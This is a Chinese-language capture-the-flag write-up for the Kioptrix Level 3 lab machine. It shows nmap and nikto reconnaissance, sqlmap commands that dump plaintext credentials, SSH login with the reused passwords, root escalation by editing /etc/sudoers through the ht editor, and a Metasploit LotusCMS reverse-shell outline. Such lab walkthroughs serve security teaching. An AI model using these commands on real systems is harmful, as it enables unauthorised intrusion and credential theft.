KioptrixVM3

一、信息收集

1.靶機IP發現,sudo arp-scan -l
2.nmap端口掃描nmap -T4 -A -v 192.168.65.136
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3.nikto目錄掃描nikto -host 192.168.65.136
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2021-03-17 06:32:14 (GMT-4) (33 seconds)
4.awvs漏掃
5.查看網頁



二、漏洞發現利用

1.sql注入http://192.168.65.136/gallery/gallery.php?id=1
(1)sqlmap 跑數據庫sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 --dbs --batch
(2)查看gallery里的表sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery --tables --batch
(3)sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T dev_accounts --columns --batch
(4)sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T dev_accounts -C username,password --dump --batch

+------------+---------------------------------------------+
| username | password |
+------------+---------------------------------------------+
| dreg | (Mast3r) |
| loneferret | (starwars) |
+------------+---------------------------------------------+

(5)sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns --batch
(6)sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T gallarific_users -C username,password --dump --batch
2.提權
(1)因為靶機開啟了22端口,我們用前面sqlmap跑出的賬戶密碼嘗試登陸ssh admin@192.168.65.136
  • admin用戶登陸失敗,登陸loneferret用戶ssh loneferret@192.168.65.136
  • loneferret登陸成功,但是不是root權限
(2)查看當前目錄下的文件, 發現報錯Error opening terminal: xterm-256color
(3) 執行命令export TERM=xterm-color,然后再打開htsudo ht(ht是一個編輯器,sudo使用root權限打開的編輯器)
(4)打開ht后,需要打開/etc/sudoers給當前賬號加上以root用戶執行/bin/bash的權限,根據底下菜單欄,按F3打開文件
(5)按F3后輸入/etc/sudoers回車,在loneferret這一行的末尾加上,/bin/bash,按F2保存,然后退出ht
(6)接著輸入sudo /bin/bash,便能成功提權
3.另一個漏洞之LotusCMS漏洞
(1)msf查詢LotusCMS漏洞search LotusCMS,設置rhostset rhost 192.168.65.136,再設置uriset uri /,然后show options查看設置好沒有
(2)漏洞利用,反彈shell
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容